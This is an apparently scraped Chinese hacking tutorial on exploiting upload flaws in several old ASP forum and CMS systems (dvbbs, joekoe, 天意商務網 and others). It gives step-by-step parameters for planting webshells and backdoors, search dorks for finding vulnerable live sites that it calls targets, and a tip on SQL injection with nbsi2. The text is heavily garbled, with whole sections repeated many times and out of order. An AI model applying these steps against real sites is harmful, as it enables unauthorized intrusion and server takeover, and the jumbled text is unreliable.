最大的網站源碼資源下載站,
自從動網7拉開上傳漏洞序幕后,各種系統的上傳漏洞接踵而來!它們的漏洞原理基本都差不多,利用方法上有略微的差異,簡言之可以歸納為幾步:先抓包,然后修改文件類型,再在上傳路徑后加上空格,用十六進制編輯器把空格改成00,最后用nc提交。當然最好還是找一個具體的upfile文件來自己分析一下,這樣有助于提高對漏洞的理解和記憶!
本文沒有太高深的技術,只不過是把目前發現有上傳漏洞的系統按編程語言分類匯總了一下,并通過桂林老兵的一個軟件,結合實例講解各種系統的漏洞利用方法。在具體實例中上傳了各種流行的webshell,以供大家參考!同時也希望借此能提醒部分程序員在編程時要注意思維的嚴密性,避免千里之堤而潰于蟻穴!下面我們先從老兵的這個工具開始!
先簡單介紹一下老兵的這個程序,界面如下圖1所示:
本文沒有太高深的技術,只不過是把目前發現有上傳漏洞的系統按編程語言分類匯總了一下,并通過桂林老兵的一個軟件,結合實例講解各種系統的漏洞利用方法。在具體實例中上傳了各種流行的webshell,以供大家參考!同時也希望借此能提醒部分程序員在編程時要注意思維的嚴密性,避免千里之堤而潰于蟻穴!下面我們先從老兵的這個工具開始!
先簡單介紹一下老兵的這個程序,界面如下圖1所示:
先簡單介紹一下老兵的這個程序,界面如下圖1所示:
圖1
為了方便說明,我們對照dvbbs的upfile.asp和reg_upload.asp兩個文件來說明(不一定要全部看懂,大概意思知道就行了)。upfile.asp文件為存在上傳漏洞的文件,而reg_upload.asp文件為我們在填上圖工具時用到的參數,也就是說,upfile.asp這個文件在執行時用到的參數都是來自reg_upload.asp文件中表單所提交的內容!
upfile是通過生成一個form表(在reg_upload.asp文件中)來實現上傳的。代碼如下:
<form name="form" method="post" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="submit" value="上傳" ...></form>
小知識:其中用到的變量如下:
filepath:默認值是uploadface,即上傳后默認的存放目錄,屬性hiden;
file1:這就是我們要傳的文件;
結合上面的代碼,我們來填寫上傳工具:
action中輸入存在上傳漏洞文件的url: http://target.net/bbs/upfile.asp
uppath里第一個文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號后面填的是上傳到對方服務器上的后門的名稱/shell.asp;輸入一個web程序允許上傳的類型文本框中默認jpg就可以了(一般網站都允許上傳jpg圖片文件);file里第一個文本框中的file1即是表單中的file1,等號后面填寫所要在本機上傳的木馬路徑;cookies中填上我們用抓取數據包工具如wsockexpert抓取的cookies值,記住最好是你在系統中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點小題大作,作者用的是一個叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經磨鋒利了,現在可以去砍柴了!實戰開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統的上傳漏洞!
asp系統上傳漏洞
1.【動網論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧!!
upfile是通過生成一個form表(在reg_upload.asp文件中)來實現上傳的。代碼如下:
<form name="form" method="post" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="submit" value="上傳" ...></form>
小知識:其中用到的變量如下:
filepath:默認值是uploadface,即上傳后默認的存放目錄,屬性hiden;
file1:這就是我們要傳的文件;
結合上面的代碼,我們來填寫上傳工具:
action中輸入存在上傳漏洞文件的url: http://target.net/bbs/upfile.asp
uppath里第一個文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號后面填的是上傳到對方服務器上的后門的名稱/shell.asp;輸入一個web程序允許上傳的類型文本框中默認jpg就可以了(一般網站都允許上傳jpg圖片文件);file里第一個文本框中的file1即是表單中的file1,等號后面填寫所要在本機上傳的木馬路徑;cookies中填上我們用抓取數據包工具如wsockexpert抓取的cookies值,記住最好是你在系統中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點小題大作,作者用的是一個叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經磨鋒利了,現在可以去砍柴了!實戰開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統的上傳漏洞!
asp系統上傳漏洞
1.【動網論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧??!
<form name="form" method="post" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="submit" value="上傳" ...></form>
小知識:其中用到的變量如下:
filepath:默認值是uploadface,即上傳后默認的存放目錄,屬性hiden;
file1:這就是我們要傳的文件;
結合上面的代碼,我們來填寫上傳工具:
action中輸入存在上傳漏洞文件的url: http://target.net/bbs/upfile.asp
uppath里第一個文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號后面填的是上傳到對方服務器上的后門的名稱/shell.asp;輸入一個web程序允許上傳的類型文本框中默認jpg就可以了(一般網站都允許上傳jpg圖片文件);file里第一個文本框中的file1即是表單中的file1,等號后面填寫所要在本機上傳的木馬路徑;cookies中填上我們用抓取數據包工具如wsockexpert抓取的cookies值,記住最好是你在系統中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點小題大作,作者用的是一個叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經磨鋒利了,現在可以去砍柴了!實戰開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統的上傳漏洞!
asp系統上傳漏洞
1.【動網論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧!!
filepath:默認值是uploadface,即上傳后默認的存放目錄,屬性hiden;
file1:這就是我們要傳的文件;
結合上面的代碼,我們來填寫上傳工具:
action中輸入存在上傳漏洞文件的url: http://target.net/bbs/upfile.asp
uppath里第一個文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號后面填的是上傳到對方服務器上的后門的名稱/shell.asp;輸入一個web程序允許上傳的類型文本框中默認jpg就可以了(一般網站都允許上傳jpg圖片文件);file里第一個文本框中的file1即是表單中的file1,等號后面填寫所要在本機上傳的木馬路徑;cookies中填上我們用抓取數據包工具如wsockexpert抓取的cookies值,記住最好是你在系統中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點小題大作,作者用的是一個叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經磨鋒利了,現在可以去砍柴了!實戰開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統的上傳漏洞!
asp系統上傳漏洞
1.【動網論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧!!
uppath里第一個文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號后面填的是上傳到對方服務器上的后門的名稱/shell.asp;輸入一個web程序允許上傳的類型文本框中默認jpg就可以了(一般網站都允許上傳jpg圖片文件);file里第一個文本框中的file1即是表單中的file1,等號后面填寫所要在本機上傳的木馬路徑;cookies中填上我們用抓取數據包工具如wsockexpert抓取的cookies值,記住最好是你在系統中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點小題大作,作者用的是一個叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經磨鋒利了,現在可以去砍柴了!實戰開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統的上傳漏洞!
asp系統上傳漏洞
1.【動網論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧!!
劉流:用wsockexpert來抓cookies有點小題大作,作者用的是一個叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經磨鋒利了,現在可以去砍柴了!實戰開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統的上傳漏洞!
asp系統上傳漏洞
1.【動網論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧??!
asp系統上傳漏洞
1.【動網論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧!!
1.【動網論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧!!
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動網的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內填上實際的數據,提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧?。?/p>
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個文本框填入:filepath;第二個填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個web程序允許上傳的類型文本框中默認jpg就可以了
file第一個文本框輸入:file1;第二個填入:d:/hacktools/muma/cmd.asp(這個是cmd.asp這個后門在自己機器上的路徑)
cookies:是我用touchnet browse這個瀏覽器抓的!其主要功能是用來驗證!沒有它會報錯的噢!填好了!我們就點擊“submit”按鍵提交吧!!
圖2
提交后用瀏覽器看一下是否成功,成功上傳!如圖3所示。
圖3
后門介紹:用的是一個很老的后門,文本框中輸入dos命令”netstat –an”點運行后,就會看到本機都開了哪些端口,及與遠程主機的連接情況了^_^
小提示:文件已經上傳成功,但沒有出現“上傳成功”的提示對話框,可以在瀏覽器里直接輸入目標站點上的webshell路徑來測試是否成功,程序有時候會有誤報。
2.【塵緣新聞系統】
塵緣新聞系統0.45 finish以下版本(測試版本v1.0 access finish)。先在google里搜索關鍵詞:v1.0 access finish,會看到出現一大堆使用塵緣雅境系統的網站,而它們就是我們的目標了!
先來分析一下如何填寫參數:比如說某網站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫:
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應的參數;uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數的填寫方法類似動網的!
提交數據,成功后結果如圖4、5所示。
小提示:文件已經上傳成功,但沒有出現“上傳成功”的提示對話框,可以在瀏覽器里直接輸入目標站點上的webshell路徑來測試是否成功,程序有時候會有誤報。
2.【塵緣新聞系統】
塵緣新聞系統0.45 finish以下版本(測試版本v1.0 access finish)。先在google里搜索關鍵詞:v1.0 access finish,會看到出現一大堆使用塵緣雅境系統的網站,而它們就是我們的目標了!
先來分析一下如何填寫參數:比如說某網站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫:
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應的參數;uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數的填寫方法類似動網的!
提交數據,成功后結果如圖4、5所示。
塵緣新聞系統0.45 finish以下版本(測試版本v1.0 access finish)。先在google里搜索關鍵詞:v1.0 access finish,會看到出現一大堆使用塵緣雅境系統的網站,而它們就是我們的目標了!
先來分析一下如何填寫參數:比如說某網站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫:
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應的參數;uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數的填寫方法類似動網的!
提交數據,成功后結果如圖4、5所示。
先來分析一下如何填寫參數:比如說某網站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫:
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應的參數;uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數的填寫方法類似動網的!
提交數據,成功后結果如圖4、5所示。
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應的參數;uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數的填寫方法類似動網的!
提交數據,成功后結果如圖4、5所示。
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應的參數;uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數的填寫方法類似動網的!
提交數據,成功后結果如圖4、5所示。
在uploadface.asp中找相應的參數;uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數的填寫方法類似動網的!
提交數據,成功后結果如圖4、5所示。
圖4
圖5
后門介紹:用的是動鯊的一個網頁木馬,執行dos之前,你還要把c:/winnt/system32/cmd.exe上傳到與網頁木馬相同的目錄下,否則命令是不會執行的!很多網站做了安全策略,利用上例的木馬dos命令不能執行,有時利用動鯊的這個asp木馬就可以執行一些dos命令了!
小提示:漏洞文件一般不用改,不過有些老版的塵緣系統的漏洞文件是uploadok.asp,如果uploadfaceok.asp不成功再改成uploadok.asp。
小提示:漏洞文件一般不用改,不過有些老版的塵緣系統的漏洞文件是uploadok.asp,如果uploadfaceok.asp不成功再改成uploadok.asp。
3.【動感下載系統】
動感下載系統xp專業版 v1.3 build 0112及以下版本。在百度里搜索:softview.asp?softid=,找到n多套系統。在它的upload.asp中存在如下表單:
<form name="form" method="post" action="upfile.asp" enctype="multipart/form-data" >
<input type="hidden" name="filepath" value="../upload200409">
<input type="hidden" name="act" value="upload">文件位置:
<input type="file" name="file1" size="38">
<input type="submit" name="submit" value="上傳" > <br>文件類型:gif/jpg/zip/rar,大小限制:3000k</form>
有功底的朋友大概都看出來問題了吧?這里文章不是分析具體漏洞的,也就不做詳細講解了,新手朋友們就直接先按下面的參數提交成功后再來慢慢研究具體的漏洞吧!如圖6、7所示。
圖6
圖7
后門介紹: _blank>冰狐浪子微型asp后門,非常小的一個后門僅一句話,也可插在別的網頁里面,它把常用功能集成到一起,寫入存在的文件、環境探測、磁盤信息、搜索網絡鄰居共享
小提示:在百度里搜索:softview.asp?softid=找到的版本是access版的程序,如果搜索/softview/softview,找到的是sql版的程序。
4.【dxxo論壇】
dxxo論壇2004年1月發布版。它的uploadface.asp文件中存在如下表單:
<form method="post" action="upload.asp" enctype="multipart/form-data" name="form2" class=tdc >
<input type=file name="file1" size="40" class=bdtj>
<input type="hidden" name=" uploadfacey" value="uploadface/">
<input type="submit" name="submit" value="上 傳" class=bdtj></form>
這里和前面的漏洞有點不同,uppath 第一個文本框中要改成uploadfacey而不是上例中的filepath,cookies的值要注冊后抓的值,不然無法成功!具體參數如下圖8,9所示。
圖8
圖9
后門介紹:一個很不錯的木馬,可以讓你在目標機器上寫文件!在保存文件的絕對路徑下的文本框中輸入目標機器上木馬的存放位置和文件名,絕對路徑下面已經給出來了!我們可以參照著它寫;在輸入馬的內容中復制上木馬的內容!點保存就ok了!
小提示:這里不要管圖8左邊文本框出現的上傳成功后顯示的文件名(下劃線部分):
<script>parent.form1.f3_content.value+='[uploadimg]fyzw_2004926201636.jpg[/uploadimg]'</script>test.jpg(1162)上傳成功!沒有看到test.asp,沒關系只要直接在瀏覽中直接輸入webshell的地址訪問就可以得到后門了(如圖9所示): http://www.ri*an.cc/bbs/uploadface/test.asp
5.【天意商務網】
天意商務網3.6、3.7版。在百度中搜索“天意商務網”,會找到很多裝有天意商務網的站點。它的add.asp文件中存在如下表單:
<form method="post" action="zs_save_add.asp" name="form1" nctype="multipart/form-data">
<input type="hidden" name="filepath" value="../../picture/">
<input type="file" class="f11" name="file" size="33"title=上傳產品圖片資料不能大于200k。(要求:250×250像素)>
這里也有一點不同,file的第一個文本框中要輸入file,“zs_save_add.asp”的確切位置是:“manage/spzs/zs_save_add.asp”,而且成功后也沒有出現“上傳成功”的對話框!參數如下圖10、11所示:
10圖
圖11
后門介紹:帶有名字,密碼,認證,可以把它偽裝成一個后臺管理界面,而且功能也很多。
小提示:天意商務網系統有一個變量id過濾不嚴,利用nbsi2很容易注入!!
⑥【喬客論壇】
所用版本:joekoe v6.0。這個是我在做實驗過程中用時最多的一個,因為參數太多,開始實驗時總是報參數錯誤。
首先來看如何找到我們用的表單:
在瀏覽中輸入http://www.zr1*3.com/user_put.asp?action=gallery(別忘了登錄噢?。┤缓蟛榭丛次募热荩?br><tr><td>上傳圖片:</td><td><iframe frameborder=0 name=upload_frame width='100%' height=30 scrolling=no src='upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic'></iframe></td></tr>
表單存放在upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic中了!
其次在表單中找參數:
在瀏覽器中輸入:http://www.zr1*3.com/upload.asp?action=gallery&upname=g2004927110356&uptext=pic'查看其源文件內容:
<form name=form1 action='?action=upfile' method=post enctype='multipart/form-data'>
<input type=hidden name=up_path value='gallery'>
<input type=hidden name=up_name value='g2004927110356'>
<input type=hidden name=up_text value='pic'><tr>
<td><input type=file name=file_name1 value='' size=40></td>
<td align=center height=30><input type=submit name=submit value='點擊上傳'>
注意:在action中輸入http://www.zr1*3.com/upload.asp?action=upfile;uppath第一個文本框中輸入:up_name,第二個中輸入上傳后的shell名稱test.asp;file 第一個文本框中輸入file_name1;參數如下圖12、13所示:
圖12
圖13
后門介紹:用的是血漢個人美化版!此木馬功能非常多,可算是木馬中的精典!第一:就算你得到了源代碼也看不到明文的密碼!第二:具有瀏覽,上傳,下載,復制,刪除,執行dos命令,執行sql命令,查看系統配置及nfso功能!
小提示:http://www.zr1*3.com/upload.asp?action=upfile,以參數action=upfile一定不能丟?。?!如圖13所示,后門所在路徑為:upload/other/test.asp
5.【天意商務網】
天意商務網3.6、3.7版。在百度中搜索“天意商務網”,會找到很多裝有天意商務網的站點。它的add.asp文件中存在如下表單:
<form method="post" action="zs_save_add.asp" name="form1" nctype="multipart/form-data">
<input type="hidden" name="filepath" value="../../picture/">
<input type="file" class="f11" name="file" size="33"title=上傳產品圖片資料不能大于200k。(要求:250×250像素)>
這里也有一點不同,file的第一個文本框中要輸入file,“zs_save_add.asp”的確切位置是:“manage/spzs/zs_save_add.asp”,而且成功后也沒有出現“上傳成功”的對話框!參數如下圖10、11所示:
10圖
圖11
后門介紹:帶有名字,密碼,認證,可以把它偽裝成一個后臺管理界面,而且功能也很多。
小提示:天意商務網系統有一個變量id過濾不嚴,利用nbsi2很容易注入!!
⑥【喬客論壇】
所用版本:joekoe v6.0。這個是我在做實驗過程中用時最多的一個,因為參數太多,開始實驗時總是報參數錯誤。
首先來看如何找到我們用的表單:
在瀏覽中輸入http://www.zr1*3.com/user_put.asp?action=gallery(別忘了登錄噢!)然后查看源文件內容:
<tr><td>上傳圖片:</td><td><iframe frameborder=0 name=upload_frame width='100%' height=30 scrolling=no src='upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic'></iframe></td></tr>
表單存放在upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic中了!
其次在表單中找參數:
在瀏覽器中輸入:http://www.zr1*3.com/upload.asp?action=gallery&upname=g2004927110356&uptext=pic'查看其源文件內容:
<form name=form1 action='?action=upfile' method=post enctype='multipart/form-data'>
<input type=hidden name=up_path value='gallery'>
<input type=hidden name=up_name value='g2004927110356'>
<input type=hidden name=up_text value='pic'><tr>
<td><input type=file name=file_name1 value='' size=40></td>
<td align=center height=30><input type=submit name=submit value='點擊上傳'>
注意:在action中輸入http://www.zr1*3.com/upload.asp?action=upfile;uppath第一個文本框中輸入:up_name,第二個中輸入上傳后的shell名稱test.asp;file 第一個文本框中輸入file_name1;參數如下圖12、13所示:
圖12
圖13
后門介紹:用的是血漢個人美化版!此木馬功能非常多,可算是木馬中的精典!第一:就算你得到了源代碼也看不到明文的密碼!第二:具有瀏覽,上傳,下載,復制,刪除,執行dos命令,執行sql命令,查看系統配置及nfso功能!
小提示:http://www.zr1*3.com/upload.asp?action=upfile,以參數action=upfile一定不能丟?。?!如圖13所示,后門所在路徑為:upload/other/test.asp
新聞熱點
疑難解答